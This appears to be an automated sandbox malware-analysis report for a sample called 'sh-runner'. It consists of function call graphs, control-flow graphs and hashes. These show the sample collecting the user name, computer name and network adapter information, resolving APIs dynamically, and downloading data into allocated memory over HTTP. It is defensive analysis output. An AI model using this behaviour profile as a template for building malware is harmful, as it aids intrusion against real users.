6160->6161 6163 112cf6bd546 6160->6163 6162 112cf6bd617 LdrGetProcedureAddress 6161->6162 6161->6163 6162->6163 6867 112cf6b0b90 6869 112cf6b0bd4 6867->6869 6868 112cf6b0caf 6869->6868 6870 112cf6c36f0 NtAddBootEntry 6869->6870 6870->6868 6871 112cf4c016d 6872 112cf4c01e9 6871->6872 6873 112cf4c0366 9 API calls 6872->6873 6874 112cf4c029a 6872->6874 6873->6874 6185 112cf4c0366 6186 112cf4c0375 LoadLibraryA InternetOpenA 6185->6186 6189 112cf4c03b2 InternetConnectA 6186->6189 6196 112cf4c044e 6189->6196 6191 112cf4c0456 HttpOpenRequestA 6193 112cf4c046f 6191->6193 6194 112cf4c04ef VirtualAlloc InternetReadFile 6193->6194 6194->6193 6195 112cf4c03a3 6194->6195 6197 112cf4c0456 HttpOpenRequestA 6196->6197 6199 112cf4c046f 6197->6199 6198 112cf4c04ef VirtualAlloc InternetReadFile 6198->6199 6200 112cf4c03d6 6198->6200 6199->6198 6200->6191 6200->6193 6049 112cf6c6a20 6052 112cf6bb740 6049->6052 6051 112cf6c6a5e 6059 112cf6c5dc0 6052->6059 6056 112cf6c5dc0 NtAddBootEntry 6057 112cf6bbd59 6056->6057 6057->6051 6058 112cf6bb7db 6058->6056 6060 112cf6c5dda 6059->6060 6062 112cf6bb7c3 6059->6062 6060->6062 6071 112cf6c2df0 6060->6071 6062->6058 6063 112cf6b2a60 6062->6063 6064 112cf6b2aec 6063->6064 6065 112cf6b2b27 6063->6065 6078 112cf6be9a0 6064->6078 6067 112cf6c5dc0 NtAddBootEntry 6065->6067 6068 112cf6b2c51 6067->6068 6082 112cf6c5bb0 6068->6082 6074 112cf6c4050 6071->6074 6073 112cf6c2e50 6073->6062 6075 112cf6c40e1 6074->6075 6076 112cf6c4087 6074->6076 6075->6073 6076->6075 6077 112cf6c40df NtAddBootEntry 6076->6077 6077->6075 6079 112cf6be9e5 6078->6079 6087 112cf6c6a20 6079->6087 6081 112cf6bea85 6081->6065 6083 112cf6c5dc0 NtAddBootEntry 6082->6083 6084 112cf6c5bd1 6083->6084 6085 112cf6b2c56 6084->6085 6090 112cf6c6110 6084->6090 6085->6058 6088 112cf6bb740 NtAddBootEntry 6087->6088 6089 112cf6c6a5e 6088->6089 6089->6081 6091 112cf6c611e 6090->6091 6092 112cf6c6151 6091->6092 6093 112cf6c631b 6091->6093 6096 112cf6c6171 6091->6096 6094 112cf6c5dc0 NtAddBootEntry 6092->6094 6092->6096 6095 112cf6c5dc0 NtAddBootEntry 6093->6095 6093->6096 6094->6096 6095->6096 6096->6084 6097 112cf6b9d1b 6098 112cf6b9d38 6097->6098 6123 112cf6c3830 6098->6123 6103 112cf6c4310 NtAddBootEntry 6104 112cf6ba468 6103->6104 6105 112cf6c4310 NtAddBootEntry 6104->6105 6110 112cf6ba5fa 6104->6110 6106 112cf6ba49c 6105->6106 6107 112cf6c4310 NtAddBootEntry 6106->6107 6106->6110 6108 112cf6ba4d0 6107->6108 6109 112cf6c4310 NtAddBootEntry 6108->6109 6108->6110 6111 112cf6ba4ff 6109->6111 6112 112cf6ba777 6110->6112 6127 112cf6c48a0 6110->6127 6111->6110 6114 112cf6c4310 NtAddBootEntry 6111->6114 6115 112cf6ba535 6114->6115 6115->6110 6116 112cf6c4310 NtAddBootEntry 6115->6116 6117 112cf6ba566 6116->6117 6117->6110 6118 112cf6c4310 NtAddBootEntry 6117->6118 6119 112cf6ba595 6118->6119 6119->6110 6120 112cf6c4310 NtAddBootEntry 6119->6120 6121 112cf6ba5c6 6120->6121 6121->6110 6122 112cf6c4310 NtAddBootEntry 6121->6122 6122->6110 6124 112cf6b9f39 6123->6124 6125 112cf6c3876 6123->6125 6124->6110 6131 112cf6c4310 6124->6131 6125->6124 6126 112cf6c38e9 NtAddBootEntry 6125->6126 6126->6124 6128 112cf6c490f 6127->6128 6129 112cf6c48ce 6127->6129 6128->6112 6129->6128 6130 112cf6c490d NtAddBootEntry 6129->6130 6130->6128 6132 112cf6c4347 6131->6132 6133 112cf6ba439 6131->6133 6132->6133 6134 112cf6c43a1 NtAddBootEntry 6132->6134 6133->6103 6133->6110 6134->6133 6235 112cf6b0a20 6237 112cf6b0a50 6235->6237 6236 112cf6b0b7c 6237->6236 6239 112cf6c36f0 6237->6239 6240 112cf6c37ec 6239->6240 6241 112cf6c3763 6239->6241 6240->6236 6241->6240 6242 112cf6c37ea NtAddBootEntry 6241->6242 6242->6240 6489 112cf6b85a0 6490 112cf6b85be 6489->6490 6491 112cf6b85a8 6489->6491 6494 112cf6b7d20 6491->6494 6501 112cf6b6a90 6494->6501 6496 112cf6b7d4d 6497 112cf6b7d70 6 API calls 6496->6497 6498 112cf6b7d5e 6497->6498 6745 112cf6b82a0 6498->6745 6502 112cf6b6ae6 6501->6502 6503 112cf6bd510 LdrGetProcedureAddress 6502->6503 6652 112cf6b7be2 6502->6652 6504 112cf6b6b13 6503->6504 6505 112cf6bd510 LdrGetProcedureAddress 6504->6505 6506 112cf6b6b32 6505->6506 6507 112cf6bd510 LdrGetProcedureAddress 6506->6507 6508 112cf6b6b51 6507->6508 6509 112cf6bd510 LdrGetProcedureAddress 6508->6509 6510 112cf6b6b70 6509->6510 6511 112cf6bd510 LdrGetProcedureAddress 6510->6511 6512 112cf6b6b8f 6511->6512 6513 112cf6bd510 LdrGetProcedureAddress 6512->6513 6514 112cf6b6bae 6513->6514 6515 112cf6bd510 LdrGetProcedureAddress 6514->6515 6516 112cf6b6bcd 6515->6516 6517 112cf6bd510 LdrGetProcedureAddress 6516->6517 6518 112cf6b6bec 6517->6518 6519 112cf6bd510 LdrGetProcedureAddress 6518->6519 6520 112cf6b6c0b 6519->6520 6521 112cf6bd510 LdrGetProcedureAddress 6520->6521 6522 112cf6b6c2a 6521->6522 6523 112cf6bd510 LdrGetProcedureAddress 6522->6523 6524 112cf6b6c49 6523->6524 6525 112cf6bd510 LdrGetProcedureAddress 6524->6525 6526 112cf6b6c68 6525->6526 6527 112cf6bd510 LdrGetProcedureAddress 6526->6527 6528 112cf6b6c87 6527->6528 6529 112cf6bd510 LdrGetProcedureAddress 6528->6529 6530 112cf6b6ca6 6529->6530 6531 112cf6bd510 LdrGetProcedureAddress 6530->6531 6532 112cf6b6cc5 6531->6532 6533 112cf6bd510 LdrGetProcedureAddress 6532->6533 6534 112cf6b6ce4 6533->6534 6535 112cf6bd510 LdrGetProcedureAddress 6534->6535 6536 112cf6b6d03 6535->6536 6537 112cf6bd510 LdrGetProcedureAddress 6536->6537 6538 112cf6b6d22 6537->6538 6539 112cf6bd510 LdrGetProcedureAddress 6538->6539 6540 112cf6b6d41 6539->6540 6541 112cf6bd510 LdrGetProcedureAddress 6540->6541 6542 112cf6b6d60 6541->6542 6543 112cf6bd510 LdrGetProcedureAddress 6542->6543 6544 112cf6b6d7f 6543->6544 6545 112cf6bd510 LdrGetProcedureAddress 6544->6545 6546 112cf6b6d9e 6545->6546 6547 112cf6bd510 LdrGetProcedureAddress 6546->6547 6548 112cf6b6dbd 6547->6548 6549 112cf6bd510 LdrGetProcedureAddress 6548->6549 6550 112cf6b6ddc 6549->6550 6551 112cf6bd510 LdrGetProcedureAddress 6550->6551 6552 112cf6b6dfb 6551->6552 6553 112cf6bd510 LdrGetProcedureAddress 6552->6553 6554 112cf6b6e1a 6553->6554 6555 112cf6bd510 LdrGetProcedureAddress 6554->6555 6556 112cf6b6e39 6555->6556 6557 112cf6bd510 LdrGetProcedureAddress 6556->6557 6558 112cf6b6e58 6557->6558 6559 112cf6bd510 LdrGetProcedureAddress 6558->6559 6560 112cf6b6e77 6559->6560 6561 112cf6bd510 LdrGetProcedureAddress 6560->6561 6562 112cf6b6e96 6561->6562 6563 112cf6bd510 LdrGetProcedureAddress 6562->6563 6564 112cf6b6eb5 6563->6564 6565 112cf6bd510 LdrGetProcedureAddress 6564->6565 6566 112cf6b6ed4 6565->6566 6567 112cf6bd510 LdrGetProcedureAddress 6566->6567 6568 112cf6b6ef3 6567->6568 6569 112cf6bd510 LdrGetProcedureAddress 6568->6569 6570 112cf6b6f12 6569->6570 6571 112cf6bd510 LdrGetProcedureAddress 6570->6571 6572 112cf6b6f31 6571->6572 6573 112cf6bd510 LdrGetProcedureAddress 6572->6573 6574 112cf6b6f50 6573->6574 6575 112cf6bd510 LdrGetProcedureAddress 6574->6575 6576 112cf6b6f6f 6575->6576 6577 112cf6bd510 LdrGetProcedureAddress 6576->6577 6578 112cf6b6f8e 6577->6578 6579 112cf6bd510 LdrGetProcedureAddress 6578->6579 6580 112cf6b6fad 6579->6580 6581 112cf6bd510 LdrGetProcedureAddress 6580->6581 6582 112cf6b6fcc 6581->6582 6583 112cf6bd510 LdrGetProcedureAddress 6582->6583 6584 112cf6b6feb 6583->6584 6585 112cf6bd510 LdrGetProcedureAddress 6584->6585 6586 112cf6b700a 6585->6586 6587 112cf6bd510 LdrGetProcedureAddress 6586->6587 6588 112cf6b7029 6587->6588 6589 112cf6bd510 LdrGetProcedureAddress 6588->6589 6590 112cf6b7048 6589->6590 6591 112cf6bd510 LdrGetProcedureAddress 6590->6591 6592 112cf6b7067 6591->6592 6593 112cf6bd510 LdrGetProcedureAddress 6592->6593 6594 112cf6b7086 6593->6594 6595 112cf6bd510 LdrGetProcedureAddress 6594->6595 6596 112cf6b70a5 6595->6596 6597 112cf6bd510 LdrGetProcedureAddress 6596->6597 6598 112cf6b70c4 6597->6598 6599 112cf6bd510 LdrGetProcedureAddress 6598->6599 6600 112cf6b70e3 6599->6600 6601 112cf6bd510 LdrGetProcedureAddress 6600->6601 6602 112cf6b7102 6601->6602 6603 112cf6bd510 LdrGetProcedureAddress 6602->6603 6604 112cf6b7121 6603->6604 6605 112cf6bd510 LdrGetProcedureAddress 6604->6605 6606 112cf6b7140 6605->6606 6607 112cf6bd510 LdrGetProcedureAddress 6606->6607 6608 112cf6b715f 6607->6608 6609 112cf6bd510 LdrGetProcedureAddress 6608->6609 6610 112cf6b717e 6609->6610 6611 112cf6bd510 LdrGetProcedureAddress 6610->6611 6612 112cf6b719d 6611->6612 6613 112cf6bd510 LdrGetProcedureAddress 6612->6613 6614 112cf6b71bc 6613->6614 6615 112cf6bd510 LdrGetProcedureAddress 6614->6615 6616 112cf6b71db 6615->6616 6617 112cf6bd510 LdrGetProcedureAddress 6616->6617 6618 112cf6b71fa 6617->6618 6619 112cf6bd510 LdrGetProcedureAddress 6618->6619 6632 112cf6b7a84 6618->6632 6620 112cf6b7321 6619->6620 6621 112cf6bd510 LdrGetProcedureAddress 6620->6621 6622 112cf6b7340 6621->6622 6623 112cf6bd510 LdrGetProcedureAddress 6622->6623 6624 112cf6b735f 6623->6624 6625 112cf6bd510 LdrGetProcedureAddress 6624->6625 6626 112cf6b737e 6625->6626 6627 112cf6bd510 LdrGetProcedureAddress 6626->6627 6628 112cf6b739d 6627->6628 6629 112cf6bd510 LdrGetProcedureAddress 6628->6629 6630 112cf6b73bc 6629->6630 6631 112cf6bd510 LdrGetProcedureAddress 6630->6631 6633 112cf6b73db 6631->6633 6632->6652 6750 112cf6b1160 6632->6750 6634 112cf6bd510 LdrGetProcedureAddress 6633->6634 6636 112cf6b73fa 6634->6636 6637 112cf6bd510 LdrGetProcedureAddress 6636->6637 6638 112cf6b7419 6637->6638 6639 112cf6bd510 LdrGetProcedureAddress 6638->6639 6640 112cf6b7438 6639->6640 6641 112cf6bd510 LdrGetProcedureAddress 6640->6641 6642 112cf6b7457 6641->6642 6643 112cf6bd510 LdrGetProcedureAddress 6642->6643 6644 112cf6b7476 6643->6644 6645 112cf6bd510 LdrGetProcedureAddress 6644->6645 6646 112cf6b7495 6645->6646 6647 112cf6bd510 LdrGetProcedureAddress 6646->6647 6648 112cf6b74b4 6647->6648 6649 112cf6bd510 LdrGetProcedureAddress 6648->6649 6650 112cf6b74d3 6649->6650 6651 112cf6bd510 LdrGetProcedureAddress 6650->6651 6653 112cf6b74f2 6651->6653 6652->6496 6654 112cf6bd510 LdrGetProcedureAddress 6653->6654 6655 112cf6b7511 6654->6655 6656 112cf6bd510 LdrGetProcedureAddress 6655->6656 6657 112cf6b7530 6656->6657 6658 112cf6bd510 LdrGetProcedureAddress 6657->6658 6659 112cf6b754f 6658->6659 6660 112cf6bd510 LdrGetProcedureAddress 6659->6660 6661 112cf6b756e 6660->6661 6662 112cf6bd510 LdrGetProcedureAddress 6661->6662 6663 112cf6b758d 6662->6663 6664 112cf6bd510 LdrGetProcedureAddress 6663->6664 6665 112cf6b75ac 6664->6665 6666 112cf6bd510 LdrGetProcedureAddress 6665->6666 6667 112cf6b75cb 6666->6667 6668 112cf6bd510 LdrGetProcedureAddress 6667->6668 6669 112cf6b75ea 6668->6669 6670 112cf6bd510 LdrGetProcedureAddress 6669->6670 6671 112cf6b7609 6670->6671 6672 112cf6bd510 LdrGetProcedureAddress 6671->6672 6673 112cf6b7628 6672->6673 6674 112cf6bd510 LdrGetProcedureAddress 6673->6674 6675 112cf6b7647 6674->6675 6676 112cf6bd510 LdrGetProcedureAddress 6675->6676 6677 112cf6b7666 6676->6677 6678 112cf6bd510 LdrGetProcedureAddress 6677->6678 6679 112cf6b7685 6678->6679 6680 112cf6bd510 LdrGetProcedureAddress 6679->6680 6681 112cf6b76a4 6680->6681 6682 112cf6bd510 LdrGetProcedureAddress 6681->6682 6683 112cf6b76c3 6682->6683 6684 112cf6bd510 LdrGetProcedureAddress 6683->6684 6685 112cf6b76e2 6684->6685 6686 112cf6bd510 LdrGetProcedureAddress 6685->6686 6687 112cf6b7701 6686->6687 6688 112cf6bd510 LdrGetProcedureAddress 6687->6688 6689 112cf6b7720 6688->6689 6690 112cf6bd510 LdrGetProcedureAddress 6689->6690 6691 112cf6b773f 6690->6691 6692 112cf6bd510 LdrGetProcedureAddress 6691->6692 6693 112cf6b775e 6692->6693 6694 112cf6bd510 LdrGetProcedureAddress 6693->6694 6695 112cf6b777d 6694->6695 6696 112cf6bd510 LdrGetProcedureAddress 6695->6696 6697 112cf6b779c 6696->6697 6698 112cf6bd510 LdrGetProcedureAddress 6697->6698 6699 112cf6b77bb 6698->6699 6700 112cf6bd510 LdrGetProcedureAddress 6699->6700 6701 112cf6b77da 6700->6701 6702 112cf6bd510 LdrGetProcedureAddress 6701->6702 6703 112cf6b77f9 6702->6703 6704 112cf6bd510 LdrGetProcedureAddress 6703->6704 6705 112cf6b7818 6704->6705 6706 112cf6bd510 LdrGetProcedureAddress 6705->6706 6707 112cf6b7837 6706->6707 6708 112cf6bd510 LdrGetProcedureAddress 6707->6708 6709 112cf6b7856 6708->6709 6710 112cf6bd510 LdrGetProcedureAddress 6709->6710 6711 112cf6b7875 6710->6711 6712 112cf6bd510 LdrGetProcedureAddress 6711->6712 6713 112cf6b7894 6712->6713 6714 112cf6bd510 LdrGetProcedureAddress 6713->6714 6715 112cf6b78b3 6714->6715 6716 112cf6bd510 LdrGetProcedureAddress 6715->6716 6717 112cf6b78d2 6716->6717 6718 112cf6bd510 LdrGetProcedureAddress 6717->6718 6719 112cf6b78f1 6718->6719 6720 112cf6bd510 LdrGetProcedureAddress 6719->6720 6721 112cf6b7910 6720->6721 6722 112cf6bd510 LdrGetProcedureAddress 6721->6722 6723 112cf6b792f 6722->6723 6724 112cf6bd510 LdrGetProcedureAddress 6723->6724 6725 112cf6b794e 6724->6725 6726 112cf6bd510 LdrGetProcedureAddress 6725->6726 6727 112cf6b796d 6726->6727 6728 112cf6bd510 LdrGetProcedureAddress 6727->6728 6729 112cf6b798c 6728->6729 6730 112cf6bd510 LdrGetProcedureAddress 6729->6730 6731 112cf6b79ab 6730->6731 6732 112cf6bd510 LdrGetProcedureAddress 6731->6732 6733 112cf6b79ca 6732->6733 6734 112cf6bd510 LdrGetProcedureAddress 6733->6734 6735 112cf6b79e9 6734->6735 6736 112cf6bd510 LdrGetProcedureAddress 6735->6736 6737 112cf6b7a08 6736->6737 6738 112cf6bd510 LdrGetProcedureAddress 6737->6738 6739 112cf6b7a27 6738->6739 6740 112cf6bd510 LdrGetProcedureAddress 6739->6740 6741 112cf6b7a46 6740->6741 6742 112cf6bd510 LdrGetProcedureAddress 6741->6742 6743 112cf6b7a65 6742->6743 6744 112cf6bd510 LdrGetProcedureAddress 6743->6744 6744->6632 6749 112cf6b82a4 6745->6749 6753 112cf6b2890 6749->6753 6759 112cf6c6970 6749->6759 6762 112cf6c1ed0 6749->6762 6751 112cf6c3ef0 NtAddBootEntry 6750->6751 6752 112cf6b118f 6751->6752 6752->6652 6757 112cf6b28f2 6753->6757 6754 112cf6b2a35 6754->6749 6755 112cf6c1ed0 3 API calls 6755->6757 6756 112cf6be9a0 NtAddBootEntry 6756->6757 6757->6754 6757->6755 6757->6756 6758 112cf6b2a60 NtAddBootEntry 6757->6758 6758->6757 6771 112cf6bebb0 6759->6771 6761 112cf6c69a9 6761->6749 6764 112cf6c1edc 6762->6764 6763 112cf6c1f94 6763->6749 6764->6763 6765 112cf6c1f0a 6764->6765 6766 112cf6c1f17 6764->6766 6765->6763 6767 112cf6c4eb0 NtAddBootEntry 6765->6767 6766->6763 6768 112cf6c1f4d CreateFiberEx 6766->6768 6767->6763 6768->6763 6769 112cf6c1f79 DeleteFiber 6768->6769 6769->6763 6772 112cf6bebde 6771->6772 6774 112cf6bec74 6771->6774 6773 112cf6c6a20 NtAddBootEntry 6772->6773 6772->6774 6773->6774 6774->6761 6775 112cf4c01b6 6776 112cf4c01cd 6775->6776 6778 112cf4c029a 6776->6778 6779 112cf4c0366 6776->6779 6780 112cf4c0375 LoadLibraryA InternetOpenA 6779->6780 6781 112cf4c03b2 7 API calls 6780->6781 6782 112cf4c03a3 6781->6782 6143 112cf6c36f0 6144 112cf6c37ec 6143->6144 6145 112cf6c3763 6143->6145 6145->6144 6146 112cf6c37ea NtAddBootEntry 6145->6146 6146->6144 6243 112cf6c0b30 6244 112cf6c0b56 6243->6244 6245 112cf6c0cd1 6244->6245 6246 112cf6bd510 LdrGetProcedureAddress 6244->6246 6247 112cf6c0c14 6246->6247 6248 112cf6bd510 LdrGetProcedureAddress 6247->6248 6249 112cf6c0c2f 6248->6249 6250 112cf6bd510 LdrGetProcedureAddress 6249->6250 6251 112cf6c0c4a 6250->6251 6252 112cf6bd510 LdrGetProcedureAddress 6251->6252 6253 112cf6c0c65 6252->6253 6254 112cf6bd510 LdrGetProcedureAddress 6253->6254 6255 112cf6c0c80 6254->6255 6256 112cf6bd510 LdrGetProcedureAddress 6255->6256 6257 112cf6c0c9b 6256->6257 6258 112cf6bd510 LdrGetProcedureAddress 6257->6258 6259 112cf6c0cb6 6258->6259 6260 112cf6bd510 LdrGetProcedureAddress 6259->6260 6260->6245 6396 112cf6c18f0 6397 112cf6c1917 6396->6397 6398 112cf6c1b1a 6397->6398 6399 112cf6bd510 LdrGetProcedureAddress 6397->6399 6400 112cf6c19f1 6399->6400 6401 112cf6bd510 LdrGetProcedureAddress 6400->6401 6402 112cf6c1a0c 6401->6402 6403 112cf6bd510 LdrGetProcedureAddress 6402->6403 6404 112cf6c1a27 6403->6404 6405 112cf6bd510 LdrGetProcedureAddress 6404->6405 6406 112cf6c1a42 6405->6406 6407 112cf6bd510 LdrGetProcedureAddress 6406->6407 6408 112cf6c1a5d 6407->6408 6409 112cf6bd510 LdrGetProcedureAddress 6408->6409 6410 112cf6c1a78 6409->6410 6411 112cf6bd510 LdrGetProcedureAddress 6410->6411 6412 112cf6c1a93 6411->6412 6413 112cf6bd510 LdrGetProcedureAddress 6412->6413 6414 112cf6c1aae 6413->6414 6415 112cf6bd510 LdrGetProcedureAddress 6414->6415 6416 112cf6c1ac9 6415->6416 6417 112cf6bd510 LdrGetProcedureAddress 6416->6417 6418 112cf6c1ae4 6417->6418 6419 112cf6bd510 LdrGetProcedureAddress 6418->6419 6420 112cf6c1aff 6419->6420 6421 112cf6bd510 LdrGetProcedureAddress 6420->6421 6421->6398 6261 112cf6b5931 6262 112cf6b5983 6261->6262 6265 112cf6b85d0 6262->6265 6264 112cf6b59e3 6266 112cf6b85fd 6265->6266 6271 112cf6bf5b0 6266->6271 6270 112cf6b8690 6270->6264 6272 112cf6bf615 6271->6272 6273 112cf6c5dc0 NtAddBootEntry 6272->6273 6276 112cf6bf706 6272->6276 6273->6276 6274 112cf6b864e 6274->6270 6277 112cf6b82e0 6274->6277 6275 112cf6c5dc0 NtAddBootEntry 6275->6274 6276->6274 6276->6275 6278 112cf6b8324 6277->6278 6281 112cf6b841c 6277->6281 6278->6281 6283 112cf6bfa90 6278->6283 6280 112cf6b833f 6280->6281 6287 112cf6c4af0 6280->6287 6281->6270 6284 112cf6bfaa6 6283->6284 6285 112cf6bfaa2 6283->6285 6284->6285 6294 112cf6c3ef0 6284->6294 6285->6280 6288 112cf6c4b3a 6287->6288 6289 112cf6c4b19 6287->6289 6288->6281 6290 112cf6c4b1e 6289->6290 6291 112cf6c4b74 6289->6291 6290->6288 6293 112cf6c4af0 NtAddBootEntry 6290->6293 6292 112cf6c36f0 NtAddBootEntry 6291->6292 6292->6288 6293->6288 6295 112cf6c3f81 6294->6295 6296 112cf6c3f27 6294->6296 6295->6285 6296->6295 6297 112cf6c3f7f NtAddBootEntry 6296->6297 6297->6295 6164 112cf6b7d70 6165 112cf6b7da1 6164->6165 6166 112cf6b7f52 GetUserNameA 6165->6166 6173 112cf6b7f70 6166->6173 6167 112cf6b7ff3 GetComputerNameExA 6168 112cf6b805b 6167->6168 6169 112cf6b8016 6167->6169 6170 112cf6b809e GetAdaptersInfo 6168->6170 6169->6168 6172 112cf6b8034 GetComputerNameExA 6169->6172 6171 112cf6b80bc 6170->6171 6175 112cf6b80f1 6170->6175 6174 112cf6b80da GetAdaptersInfo 6171->6174 6171->6175 6172->6168 6173->6167 6174->6175 6178 112cf6b0cc0 6175->6178 6177 112cf6b81ae 6179 112cf6b0cd0 6178->6179 6181 112cf6b0ce0 6179->6181 6182 112cf6c5d30 6179->6182 6181->6177 6183 112cf6c4050 NtAddBootEntry 6182->6183 6184 112cf6c5d63 6183->6184 6184->6181 6879 112cf6b2270 6880 112cf6b2288 6879->6880 6881 112cf6c0e40 LdrGetProcedureAddress 6880->6881 6882 112cf6b22a2 6881->6882 6883 112cf6b3970 6885 112cf6b39a1 6883->6885 6884 112cf6b3a18 6885->6884 6886 112cf6b1730 NtAddBootEntry 6885->6886 6886->6884 6887 112cf6b3770 6888 112cf6b37ab 6887->6888 6889 112cf6b38dd 6888->6889 6890 112cf6b3809 6888->6890 6891 112cf6bc3b0 3 API calls 6889->6891 6892 112cf6bf5b0 NtAddBootEntry 6890->6892 6895 112cf6b38a1 6890->6895 6891->6895 6893 112cf6b3861 6892->6893 6893->6895 6896 112cf6bc3b0 6893->6896 6897 112cf6bc3ef 6896->6897 6898 112cf6bc55c 6897->6898 6899 112cf6bfa90 NtAddBootEntry 6897->6899 6898->6895 6904 112cf6bc456 6899->6904 6900 112cf6bc528 6900->6898 6906 112cf6be290 6900->6906 6902 112cf6bc57d 6902->6898 6903 112cf6be290 NtAddBootEntry 6902->6903 6903->6898 6904->6898 6904->6900 6905 112cf6c4af0 NtAddBootEntry 6904->6905 6905->6900 6908 112cf6be2db 6906->6908 6907 112cf6be2ef 6907->6902 6908->6907 6909 112cf6c39e0 NtAddBootEntry 6908->6909 6909->6907 6298 112cf6b3626 6299 112cf6b364b 6298->6299 6300 112cf6b82e0 2 API calls 6299->6300 6301 112cf6b3718 6299->6301 6300->6301

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 112cf6b7d70-112cf6b7d9f 1 112cf6b7da1-112cf6b7dae call 112cf6be850 0->1 2 112cf6b7db5-112cf6b7dc5 0->2 1->2 3 112cf6b7dcb-112cf6b7dd4 2->3 4 112cf6b7e5e-112cf6b7ecb call 112cf6be6f0 * 2 call 112cf6be630 2->4 3->4 8 112cf6b7dda-112cf6b7e0f 3->8 20 112cf6b7ecd-112cf6b7ee9 4->20 21 112cf6b7f48-112cf6b7f4d call 112cf6be630 4->21 16 112cf6b7e15-112cf6b7e36 call 112cf6c0320 8->16 22 112cf6b7e38-112cf6b7e39 16->22 20->21 30 112cf6b7eeb-112cf6b7f0d 20->30 25 112cf6b7f52-112cf6b7f6e GetUserNameA 21->25 24 112cf6b7e3b-112cf6b7e5c call 112cf6c0320 22->24 24->4 28 112cf6b7f70-112cf6b7f8c 25->28 29 112cf6b7fe9-112cf6b7fee call 112cf6be630 25->29 28->29 38 112cf6b7f8e-112cf6b7fae 28->38 33 112cf6b7ff3-112cf6b8014 GetComputerNameExA 29->33 39 112cf6b7f21-112cf6b7f26 call 112cf6be630 30->39 40 112cf6b7f0f-112cf6b7f1f call 112cf6be5c0 30->40 36 112cf6b8094-112cf6b8099 call 112cf6be630 33->36 37 112cf6b8016-112cf6b8032 33->37 46 112cf6b809e-112cf6b80ba GetAdaptersInfo 36->46 37->36 51 112cf6b8034-112cf6b8059 GetComputerNameExA 37->51 52 112cf6b7fb0-112cf6b7fc0 call 112cf6be5c0 38->52 53 112cf6b7fc2-112cf6b7fc7 call 112cf6be630 38->53 45 112cf6b7f2b-112cf6b7f46 39->45 40->45 45->25 49 112cf6b80bc-112cf6b80d8 46->49 50 112cf6b8129-112cf6b812e call 112cf6be630 46->50 49->50 69 112cf6b80da-112cf6b80ef GetAdaptersInfo 49->69 63 112cf6b8133-112cf6b829b call 112cf6be790 call 112cf6be630 * 4 call 112cf6b0cc0 call 112cf6be630 call 112cf6be690 call 112cf6be630 * 8 call 112cf6be690 call 112cf6be630 50->63 58 112cf6b806d-112cf6b8072 call 112cf6be630 51->58 59 112cf6b805b-112cf6b806b call 112cf6be5c0 51->59 62 112cf6b7fcc-112cf6b7fe7 52->62 53->62 67 112cf6b8077-112cf6b8092 58->67 59->67 62->33 67->46 72 112cf6b80f1-112cf6b8100 call 112cf6be760 69->72 73 112cf6b8102-112cf6b8107 call 112cf6be630 69->73 78 112cf6b810c-112cf6b8127 72->78 73->78 78->63
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.3055656631.00000112CF6B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000112CF6B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_112cf6b0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Name$AdaptersComputerInfo$User
                                                                      • String ID:
                                                                      • API String ID: 1713523329-3916222277
                                                                      • Opcode ID: 847f31a267256c4b477c3e55c6d651f5123c8fbdc2e5fbf7ef3bfa4e34fd3b77
                                                                      • Instruction ID: 4fca6403c0d1e98e18d8e7996bf13c061673efcb04a181fa0b8daa884c874f7e
                                                                      • Opcode Fuzzy Hash: 847f31a267256c4b477c3e55c6d651f5123c8fbdc2e5fbf7ef3bfa4e34fd3b77
                                                                      • Instruction Fuzzy Hash: 52F112303149088FE798EB2CC495FE973E1FB9C304F514568E69AC7296DE34E855DB82
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1949399354.00000112CF690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000112CF690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_112cf690000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryVirtual$AllocateProtect
                                                                      • String ID:
                                                                      • API String ID: 2931642484-0
                                                                      • Opcode ID: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
                                                                      • Instruction ID: 7f54a792e169ea6c0138c1752ad6803a1b72f27c65e03fc6a079af8bfdae468f
                                                                      • Opcode Fuzzy Hash: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
                                                                      • Instruction Fuzzy Hash: 68710530618A485FE71C9B38D842BEE77D1F788310F60562DFAD7C3292DA35D94286C2

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 115 112cf4c044e-112cf4c0474 HttpOpenRequestA 119 112cf4c0475-112cf4c04af 115->119 124 112cf4c04d0-112cf4c04ed 119->124 125 112cf4c04b1-112cf4c04c7 119->125 129 112cf4c04ef-112cf4c0535 VirtualAlloc InternetReadFile 124->129 130 112cf4c04cb call 112cf4c053d 124->130 125->130 131 112cf4c04c9 125->131 129->130 133 112cf4c053b-112cf4c053c 129->133 130->124 131->119
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000112CF4C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_112cf4c0000_sh-runner.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocFileHttpInternetOpenReadRequestVirtual
                                                                      • String ID: U.;
                                                                      • API String ID: 1187293180-4213443877
                                                                      • Opcode ID: 5690493dc9ff9f8f16933898c455d2a5e8e45ea3ee84a79ee5b969fd92fa3e91
                                                                      • Instruction ID: 1893551d209afdb88124fa866d2723ac9299860243f502e6390b5a4ee01d9720
                                                                      • Opcode Fuzzy Hash: 5690493dc9ff9f8f16933898c455d2a5e8e45ea3ee84a79ee5b969fd92fa3e91
                                                                      • Instruction Fuzzy Hash: 473106A030EF882FF71E01693C6AB3A2AD9C79A351F15419BF20DC71E3EC448C45827A

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
